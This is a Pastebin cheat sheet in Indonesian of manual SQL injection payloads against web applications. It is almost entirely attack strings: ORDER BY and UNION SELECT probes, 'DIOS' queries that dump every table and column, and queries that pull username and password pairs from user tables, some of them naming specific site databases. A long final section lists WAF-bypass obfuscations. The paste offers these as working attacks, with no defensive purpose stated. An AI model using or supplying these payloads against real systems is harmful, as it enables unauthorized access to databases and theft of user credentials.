Advertisement
Guest User

Sql manual rosit

a guest
Jul 20th, 2018
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.74 KB | None | 0 0
  1. Query Exploit SQL MANUAL
  2.  
  3. UNTUK CEK ERRORNYA
  4.  
  5. +order+by+1--
  6.  
  7. '+order+by+100--+-
  8.  
  9.  
  10. Tahap Memunculkan Angka Ajaib / angka Vuln
  11. +union+select+1,2,3--
  12.  
  13. '+/*!50000union*/+/*!50000select*/+1,2,3--+-
  14.  
  15.  
  16.  
  17. (select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  18.  
  19. '+union+select+1,2,3,4,concat(@c:=0x00,if((select count(*) from information_schema.columns where table_schema not like 0x696e666f726d6174696f6e5f736368656d61 and @c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),6,7--+-
  20.  
  21. +union select 1,concat (0x494e4a454354204259202e2f4359424552303054202d,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user(),(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))),3,4,5,6-- (kalau ga bsa pake tanda (-) (versi DIOS)
  22.  
  23.  
  24.  
  25. (Tahap Menampilkan Data yang ada pada database )
  26.  
  27. +union+select+1,2,3,concat(email,0x3a3a,password),5,6 from user--
  28. '+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(username,0x3a3a,password),22,23,24,25,26,27,28,29,30,31,32,33,34 from users--+-
  29.  
  30. +union+select+1,2,3,concat(username,0x3a3a,password),5,6,7,8,9,10 from kukan_user--
  31.  
  32. '+union+select+1,2,3,4,group_concat(username,0x3a3a,pwd,0x3a3a,level,'<br>'),6,7,8,9,10,11,12,13,14 from user--+-
  33.  
  34. '+union+select+1,2,concat(Username,0x3a,Password),4+from+user--+ (pake tanda - ) < kalau error
  35.  
  36. (SELECT(@x)FROM(SELECT(@x:=0x00)+,(SELECT(@x)FROM(kpusumba_webtemp.tb_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)
  37.  
  38. [QUERY SCHOOLHOST]
  39.  
  40. ' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
  41.  
  42. Dios tampilin table ZEROONE-04
  43.  
  44. Concat(0x3c43656e7465723e,0x4b656e746f6420627920526f73697420426f74616b,0x2d,%200x3c696d67207372633d22687474703a2f2f6f70656e7369642e696e666f2f696d616765732f526961732532304772656d6f72792e706e67223e,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)
  45.  
  46. Bypass waff:
  47.  
  48. [~]waff nampilin user pass[~]
  49.  
  50. (SELECT(@x)/*!50000FROM*/(SELECT(@x:=0x00)%20,(SELECT(@x)/*!50000FROM*/(halbarka_halbar.useradmin)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,username,0x7e,password,0x3c62723e))))x)
  51.  
  52. [~]waff nampilin table[~]
  53. halbarka_halbar
  54. (select(@x)/*!50000from*/(select(@x:=0x00),(select(0)/*!50000from*/(/*!50000information_schema*/./*!50000columns*/)/*!50000where*/(/*!50000table_schema*/=database/**_**/())/*!50000and*/(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)
  55.  
  56. [~] order by [~]
  57.  
  58. /**/ORDER/**/BY/**/
  59. /*!order*/+/*!by*/
  60. /*!ORDER BY*/
  61. /*!50000ORDER BY*/
  62. /*!50000ORDER*//**//*!50000BY*/
  63. /*!12345ORDER*/+/*!BY*/
  64.  
  65. [~] UNION select [~]
  66.  
  67. /**/union/*!50000select*/
  68. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  69. %55nion(%53elect 1,2,3)-- -
  70. +union+distinct+select+
  71. +union+distinctROW+select+
  72. /**//*!12345UNION SELECT*//**/
  73. /**//*!50000UNION SELECT*//**/
  74. /**/UNION/**//*!50000SELECT*//**/
  75. /*!50000UniON SeLeCt*/
  76. union /*!50000%53elect*/
  77. +#uNiOn+#sEleCt
  78. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  79. /*!%55NiOn*/ /*!%53eLEct*/
  80. /*!u%6eion*/ /*!se%6cect*/
  81. +un/**/ion+se/**/lect
  82. uni%0bon+se%0blect
  83. %2f**%2funion%2f**%2fselect
  84.  
  85. [~]Bypass different colum nomber[~]
  86.  
  87. and x(point(0,0)) UNION SELECT
  88. =75=75 union select
  89. +And x(point(9,9))+UNION+SELECT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement